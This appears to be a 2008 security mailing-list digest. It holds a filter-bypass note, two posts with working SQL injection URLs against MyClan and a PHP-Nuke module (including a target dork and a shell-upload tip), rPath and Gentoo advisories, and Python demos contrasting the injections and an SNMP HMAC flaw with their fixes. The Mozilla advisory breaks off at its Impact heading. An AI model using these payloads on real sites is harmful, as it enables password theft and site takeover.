SEC Consult Unternehmensberatung GmbH
www.sec-consult.com
A-1190 Vienna, Mooslackengasse 17
phone  +43 1 8903043 34
fax    +43 1 8903043 15
mobile +43 676 840301 718
email  [EMAIL PROTECTED]
Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt
Advisor for your information security.
Re: 8e6 Technologies R3000 Internet Filter Bypass with Host Decoy
I've been testing this and it appears that *any* HTTP 1.0 request will bypass the 8e6 filter (if there is not an IP in the library). I've been testing this by using scapy to generate the HTTP GET request. 1.0 succeeds and 1.1 fails.
MyClan Sql Injection
#########################################################################
# MyClan Sql Injection
#
# AUTHOR        : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
# Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
# Our Site      : Http://IRCRASH.COM
# IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#
# Script Download : www.sourceforge.net/projects/haudenschilt
#
# DORK : Copyright © 2005-2006 Battle.net Clan Script 1.5.2
#
# [Bug]
#
# http://Site/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/*
# http://Site/index.php?page=board&thread=-+union+select+0,1,password,name,4,5,6,7+from+bcs_members/*
#
# [Note]
#
# If you inject and crack the admin password you can upload a shell in the medal page in the admin panel ;)
#
# Site : Http://IRCRASH.COM
## TNX GOD ##
#########################################################################
PHP-NUKE module Kleinanzeigen SQL injection (lid)
#########################################################################
# Rbt-4 crew
# http://www.rbt-4.net
# Author : Lovebug
#
# Remote Sql injection, Php-Nuke module name Kleinanzeigen
#########################################################################
#
# modules.php?name=Kleinanzeigen&a_op=visit&lid=[sql]
#
# Exploit
#
# username : -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
# pwd      : -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
#
#########################################################################
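The MyClan post above and this Kleinanzeigen post are the same UNION-based technique in two contexts: the MyClan showmember payload breaks out of a quoted string literal, while the Kleinanzeigen lid payload sits in an unquoted numeric comparison and uses URL-encoded "/**/" in place of spaces (a common filter-evasion trick) with a trailing "/*" to comment out whatever the script appends. The following is an added example, mine and not from either post or either script: it replays both posted payloads against a constructed in-memory SQLite database that uses the table and column names the posts name (bcs_members with name/password, nuke_authors with aid/pwd/radminsuper), shows what the string-interpolated queries return, and shows the parameterised and validated versions refusing the same input. The shape of the two queries, the other columns, the "ads" table and every row value are assumptions; SQLite stands in for MySQL and accepts the unterminated trailing comment, so the payloads run unchanged.

```python
import sqlite3
from urllib.parse import unquote_plus


def build_db():
    """Constructed fixture. Only the names bcs_members/name/password and
    nuke_authors/aid/pwd/radminsuper come from the posts; the rest is made up."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE bcs_members (id INTEGER, name TEXT, rank TEXT, password TEXT);
        INSERT INTO bcs_members VALUES (1, 'admin', 'leader', 'hash-of-admin-pw');
        INSERT INTO bcs_members VALUES (2, 'guest', 'member', 'hash-of-guest-pw');
        CREATE TABLE nuke_authors (aid TEXT, pwd TEXT, radminsuper INTEGER);
        INSERT INTO nuke_authors VALUES ('God', 'hash-of-superadmin-pw', 1);
        INSERT INTO nuke_authors VALUES ('editor', 'hash-of-editor-pw', 0);
        CREATE TABLE ads (lid INTEGER, title TEXT, active INTEGER);
        INSERT INTO ads VALUES (7, 'Used bike', 1);
    """)
    return db


# --- assumed shape of the two vulnerable queries ---------------------------

def member_vulnerable(db, showmember):
    """MyClan case: user input interpolated into a quoted literal. Four
    selected columns, so the attacker's UNION supplies four as well."""
    sql = ("SELECT id, name, rank, password FROM bcs_members "
           "WHERE id='%s'" % showmember)
    return db.execute(sql).fetchall()


def ad_vulnerable(db, lid):
    """Kleinanzeigen case: unquoted numeric parameter followed by a trailing
    clause, which the payload's closing '/*' comments out."""
    sql = "SELECT lid, title FROM ads WHERE lid=%s AND active=1" % lid
    return db.execute(sql).fetchall()


# --- the same lookups done safely -----------------------------------------

def member_safe(db, showmember):
    """Bound parameter: the whole payload is compared as one opaque value."""
    sql = "SELECT id, name, rank, password FROM bcs_members WHERE id=?"
    return db.execute(sql, (showmember,)).fetchall()


def ad_safe(db, lid):
    """Numeric parameter: reject anything that is not an integer before it
    gets near the query, then bind it anyway."""
    lid = int(lid)  # raises ValueError on the injection string
    sql = "SELECT lid, title FROM ads WHERE lid=? AND active=1"
    return db.execute(sql, (lid,)).fetchall()


# The two payloads exactly as posted: '+' encodes a space, %2F%2A%2A%2F is
# the "/**/" whitespace substitute, %2F%2A the trailing "/*".
MYCLAN_PAYLOAD = "'+union+select+name,1,2,password+from+bcs_members/*"
NUKE_PAYLOAD = ("-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid"
                "%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere"
                "%2F%2A%2A%2Fradminsuper%3D1%2F%2A")


def decode(payload):
    """What the web server hands the PHP script after URL decoding."""
    return unquote_plus(payload)


def demo():
    db = build_db()
    out = {
        "myclan_vuln": sorted(member_vulnerable(db, decode(MYCLAN_PAYLOAD))),
        "myclan_safe": member_safe(db, decode(MYCLAN_PAYLOAD)),
        "nuke_vuln": ad_vulnerable(db, decode(NUKE_PAYLOAD)),
    }
    try:
        ad_safe(db, decode(NUKE_PAYLOAD))
        out["nuke_safe"] = "accepted"
    except ValueError:
        out["nuke_safe"] = "rejected"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The vulnerable member lookup returns every member's name and password hash through the UNION; the vulnerable ad lookup returns the super-admin's aid, and swapping aid for pwd (the second Kleinanzeigen payload) returns the hash the same way. The MyClan thread payload follows the same numeric-context pattern with eight columns. Both safe variants return nothing or refuse the input outright.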
rPSA-2008-0246-1 gaim
rPath Security Advisory: 2008-0246-1
Published: 2008-08-05
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    [EMAIL PROTECTED]:1/1.5.0-4.3-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2647

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2956

Description:
    Previous versions of the gaim package are vulnerable to multiple attacks, the most serious of which may allow a remote attacker to exploit the MSN protocol handler and thus execute arbitrary code as the user running gaim.

http://wiki.rpath.com/Advisories:rPSA-2008-0246

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
rPSA-2008-0245-1 cups
rPath Security Advisory: 2008-0245-1
Published: 2008-08-05
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Remote Root Deterministic Unauthorized Access
Updated Versions:
[EMAIL PROTECTED]:1/1.1.23-14.8-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-2390

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1374

Description:
Previous versions of the cups package are vulnerable to an Arbitrary Code Execution attack in which an attacker may use a maliciously crafted PDF file to trigger an integer overflow on 64-bit platforms.

http://wiki.rpath.com/Advisories:rPSA-2008-0245

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
[ GLSA 200808-04 ] Wireshark: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200808-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Wireshark: Denial of Service
      Date: August 06, 2008
      Bugs: #230411, #231587
        ID: 200808-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple Denial of Service vulnerabilities have been discovered in Wireshark.

Background
==========

Wireshark is a network protocol analyzer with a graphical front-end.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/wireshark           < 1.0.2                 >= 1.0.2

Description
===========

Multiple vulnerabilities related to memory management were discovered in the GSM SMS dissector (CVE-2008-3137), the PANA and KISMET dissectors (CVE-2008-3138), the RTMPT dissector (CVE-2008-3139), the syslog dissector (CVE-2008-3140) and the RMI dissector (CVE-2008-3141) and when reassembling fragmented packets (CVE-2008-3145).

Impact
======

A remote attacker could exploit these vulnerabilities by sending a specially crafted packet on a network being monitored by Wireshark or enticing a user to read a malformed packet trace file, causing a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Wireshark users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.0.2"

References
==========

  [ 1 ] CVE-2008-3137
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3137
  [ 2 ] CVE-2008-3138
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3138
  [ 3 ] CVE-2008-3139
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3139
  [ 4 ] CVE-2008-3140
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3140
  [ 5 ] CVE-2008-3141
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3141
  [ 6 ] CVE-2008-3145
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3145

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200808-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200808-03 ] Mozilla products: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200808-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Mozilla products: Multiple vulnerabilities
      Date: August 06, 2008
      Bugs: #204337, #218065, #230567, #231975
        ID: 200808-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been reported in Mozilla Firefox, Thunderbird, SeaMonkey and XULRunner, some of which may allow user-assisted execution of arbitrary code.

Background
==========

Mozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the 'Mozilla Application Suite'. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications like Firefox and Thunderbird.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  mozilla-firefox                  < 2.0.0.16              >= 2.0.0.16
  2  mozilla-firefox-bin              < 2.0.0.16              >= 2.0.0.16
  3  mozilla-thunderbird              < 2.0.0.16              >= 2.0.0.16
  4  mozilla-thunderbird-bin          < 2.0.0.16              >= 2.0.0.16
  5  seamonkey                        < 1.1.11                >= 1.1.11
  6  seamonkey-bin                    < 1.1.11                >= 1.1.11
  7  xulrunner                        < 1.8.1.16              >= 1.8.1.16
  8  xulrunner-bin                    < 1.8.1.16              >= 1.8.1.16
    -------------------------------------------------------------------
     8 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

The following vulnerabilities were reported in all mentioned Mozilla products:

* TippingPoint's Zero Day Initiative reported that an incorrect integer data type is used as a CSS object reference counter, leading to a counter overflow and a free() of in-use memory (CVE-2008-2785).

* Igor Bukanov, Jesse Ruderman and Gary Kwong reported crashes in the JavaScript engine, possibly triggering memory corruption (CVE-2008-2799).

* Devon Hubbard, Jesse Ruderman, and Martijn Wargers reported crashes in the layout engine, possibly triggering memory corruption (CVE-2008-2798).

* moz_bug_r_a4 reported that XUL documents that include a script from a chrome: URI that points to a fastload file would be executed with the privileges specified in the file (CVE-2008-2802).

* moz_bug_r_a4 reported that the mozIJSSubScriptLoader.LoadScript() function only applies XPCNativeWrappers to scripts loaded from standard "chrome:" URIs, which might not be the case in third-party add-ons (CVE-2008-2803).

* Astabis reported a crash in the block reflow implementation related to large images (CVE-2008-2811).

* John G. Myers, Frank Benkstein and Nils Toedtmann reported a weakness in the trust model used by Mozilla: when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, the certificate is also regarded as accepted for all domain names in subjectAltName:dNSName fields (CVE-2008-2809).

The following vulnerabilities were reported in Firefox, SeaMonkey and XULRunner:

* moz_bug_r_a4 reported that the Same Origin Policy is not properly enforced on JavaScript (CVE-2008-2800).

* Collin Jackson and Adam Barth reported that JAR signing is not properly implemented, allowing injection of JavaScript into documents within a JAR archive (CVE-2008-2801).

* Opera Software reported an error allowing for arbitrary local file upload (CVE-2008-2805).

* Daniel Glazman reported that an invalid .properties file for an add-on might lead to the usage of uninitialized memory (CVE-2008-2807).

* Masahiro Yamada reported that HTML in "file://" URLs in directory listings is not properly escaped (CVE-2008-2808).

* Geoff reported that the context of Windows Internet shortcut files is not correctly identified (CVE-2008-2810).

* The crash vulnerability (CVE-2008-1380) that was previously announced in GLSA 200805-18 is now also resolved in SeaMonkey binary ebuilds.

The following vulnerability was reported in Firefox only:

* Billy Rios reported that the pipe character in a command-line URI is identified as a request to open multiple tabs, allowing "chrome" and "file" URIs to be opened (CVE-2008-2933).

Impact
======
[ GLSA 200808-02 ] Net-SNMP: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200808-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Net-SNMP: Multiple vulnerabilities
      Date: August 06, 2008
      Bugs: #65, #225105
        ID: 200808-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Net-SNMP allow for authentication bypass in snmpd and execution of arbitrary code in Perl applications using Net-SNMP.

Background
==========

Net-SNMP is a collection of tools for generating and retrieving SNMP data. The SNMPv3 protocol uses a keyed-Hash Message Authentication Code (HMAC) to verify data integrity and authenticity of SNMP messages.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/net-snmp            < 5.4.1.1               >= 5.4.1.1

Description
===========

Wes Hardaker reported that the SNMPv3 HMAC verification relies on the client to specify the HMAC length (CVE-2008-0960). John Kortink reported a buffer overflow in the Perl bindings of Net-SNMP when processing the OCTETSTRING in an attribute value pair (AVP) received by an SNMP agent (CVE-2008-2292).

Impact
======

An attacker could send SNMPv3 packets to an instance of snmpd providing a valid user name and an HMAC length value of 1, and easily conduct brute-force attacks to bypass SNMP authentication. An attacker could further entice a user to connect to a malicious SNMP agent with an SNMP client using the Perl bindings, possibly resulting in the execution of arbitrary code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Net-SNMP users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/net-snmp-5.4.1.1"

References
==========

  [ 1 ] CVE-2008-0960
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960
  [ 2 ] CVE-2008-2292
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200808-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
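The CVE-2008-0960 flaw in the advisory above comes down to a MAC check that lets the sender choose how many tag bytes are compared. The following is an added example (not Net-SNMP's code) showing that weak check beside a strict one, using HMAC-SHA1-96 as SNMPv3 USM does; the key and message bytes are constructed, and the zero-filling of the authentication field before the MAC is computed is omitted for brevity.

```python
import hmac
import hashlib

# SNMPv3 USM (RFC 3414) truncates HMAC-SHA1 to 96 bits (12 octets) for
# msgAuthenticationParameters. Constructed example; not Net-SNMP's code.
AUTH_PARAM_LEN = 12


def compute_auth_params(auth_key: bytes, whole_msg: bytes) -> bytes:
    """HMAC-SHA1-96 tag over the message (zero-filling of the auth field
    before hashing is omitted here for brevity)."""
    return hmac.new(auth_key, whole_msg, hashlib.sha1).digest()[:AUTH_PARAM_LEN]


def verify_weak(auth_key: bytes, whole_msg: bytes, received: bytes) -> bool:
    """Flawed check in the spirit of CVE-2008-0960: the expected tag is cut
    down to whatever length the sender supplied, so a 1-byte tag passes one
    time in 256 and an empty tag passes every time."""
    expected = compute_auth_params(auth_key, whole_msg)
    return expected[:len(received)] == received


def verify_strict(auth_key: bytes, whole_msg: bytes, received: bytes) -> bool:
    """Hardened check: the tag length is fixed by the protocol, not by the
    sender, and the comparison is constant-time."""
    if len(received) != AUTH_PARAM_LEN:
        return False
    expected = compute_auth_params(auth_key, whole_msg)
    return hmac.compare_digest(expected, received)


def check_cases(auth_key: bytes, whole_msg: bytes) -> dict:
    """Run both verifiers over a genuine tag, a 1-byte tag and an empty tag;
    returns {case: (weak_result, strict_result)}."""
    tag = compute_auth_params(auth_key, whole_msg)
    cases = {"full": tag, "one_byte": tag[:1], "empty": b""}
    return {name: (verify_weak(auth_key, whole_msg, t),
                   verify_strict(auth_key, whole_msg, t))
            for name, t in cases.items()}


if __name__ == "__main__":
    # Constructed key and message bytes for demonstration only.
    key = b"constructed-localized-auth-key"
    msg = b"constructed SNMPv3 message with msgFlags authFlag set"
    for name, (weak, strict) in check_cases(key, msg).items():
        print(f"{name:9s} weak={weak!s:5s} strict={strict}")
```

The strict verifier is the shape of the fix: reject any tag whose length differs from the protocol-defined 12 octets before comparing anything.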
[ GLSA 200808-01 ] xine-lib: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200808-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: xine-lib: User-assisted execution of arbitrary code
      Date: August 06, 2008
      Bugs: #213039, #214270, #218059
        ID: 200808-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

xine-lib is vulnerable to multiple buffer overflows when processing media streams.

Background
==========

xine-lib is the core library package for the xine media player, and other players such as Amarok, Codeine/Dragon Player and Kaffeine.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  media-libs/xine-lib              < 1.1.13                >= 1.1.13

Description
===========

Multiple vulnerabilities have been discovered in xine-lib:

* Alin Rad Pop of Secunia reported an array indexing vulnerability in the sdpplin_parse() function in the file input/libreal/sdpplin.c when processing streams from RTSP servers that contain a large "streamid" SDP parameter (CVE-2008-0073).

* Luigi Auriemma reported multiple integer overflows that result in heap-based buffer overflows when processing ".FLV", ".MOV", ".RM", ".MVE", ".MKV", and ".CAK" files (CVE-2008-1482).

* Guido Landi reported a stack-based buffer overflow in the demux_nsf_send_chunk() function when handling titles within NES Music (.NSF) files (CVE-2008-1878).

Impact
======

A remote attacker could entice a user to play a specially crafted video file or stream with a player using xine-lib, potentially resulting in the execution of arbitrary code with the privileges of the user running the player.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All xine-lib users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.13"

References
==========

  [ 1 ] CVE-2008-0073
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0073
  [ 2 ] CVE-2008-1482
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1482
  [ 3 ] CVE-2008-1878
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1878

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200808-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5